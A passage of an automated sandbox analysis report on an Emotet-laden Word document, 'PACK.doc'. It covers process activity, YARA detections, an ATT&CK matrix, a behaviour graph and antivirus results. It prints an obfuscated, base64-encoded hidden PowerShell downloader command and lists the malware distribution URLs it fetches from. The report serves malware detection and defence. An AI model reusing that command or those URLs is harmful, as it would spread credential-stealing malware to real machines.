nAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000012.00000002.2114668618.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099273377.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2105305860.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103683744.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2113027910.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2116945153.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101721678.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2117172638.0000000000301000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2103560548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2101746597.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109151387.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114707003.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100654563.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110616410.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112015647.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106388395.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2119170548.0000000000291000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351272233.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109044611.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106314094.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2100698593.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110668347.0000000000281000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2351339088.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2107874642.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2112073559.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2108018320.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099440995.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2112967165.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2119062368.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2105231881.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.6e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 336504 Sample: PACK.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 12 other signatures 2->64 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 23 2->17         started        process3 file4 78 Suspicious powershell command line found 14->78 80 Very long command line found 14->80 82 Encrypted powershell cmdline option found 14->82 84 PowerShell case anomaly found 14->84 20 powershell.exe 12 9 14->20         started        25 msg.exe 14->25         started        50 C:\Users\user\Desktop\~$PACK.doc, data 17->50 dropped signatures5 process6 dnsIp7 54 petafilm.com 176.53.69.151, 49167, 80 RADORETR Turkey 20->54 52 C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32 20->52 dropped 68 Powershell drops PE file 20->68 27 rundll32.exe 20->27         started        file8 signatures9 process10 process11 29 rundll32.exe 15 27->29         started        signatures12 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->76 32 rundll32.exe 5 29->32         started        process13 signatures14 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->56 35 rundll32.exe 5 32->35         started        process15 signatures16 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->66 38 rundll32.exe 5 35->38         started        process17 signatures18 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->70 41 rundll32.exe 5 38->41         started        process19 signatures20 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->72 44 rundll32.exe 5 41->44         started        process21 signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->74 47 rundll32.exe 5 44->47         started        process23 signatures24 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 47->86

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PACK.doc30%VirustotalBrowse
                      PACK.doc50%ReversingLabsDocument-Word.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      18.2.rundll32.exe.700000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.1d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.rundll32.exe.290000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.rundll32.exe.300000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.250000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.1e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.280000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      petafilm.com6%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://petafilm.com6%VirustotalBrowse
                      http://petafilm.com0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://zieflix.teleskopstore.com/cgi-bin/Gt3S/5%VirustotalBrowse
                      http://zieflix.teleskopstore.com/cgi-bin/Gt3S/0%Avira URL Cloudsafe
                      http://5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/0%Avira URL Cloudsafe
                      https://somanap.com/wp-admin/P/0%Avira URL Cloudsafe
                      https://fnjbq.com/wp-includes/rlR/100%Avira URL Cloudmalware
                      http://wap.zhonglisc.com/wp-includes/QryCB/100%Avira URL Cloudmalware
                      http://petafilm.com/wp-admin/4m/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
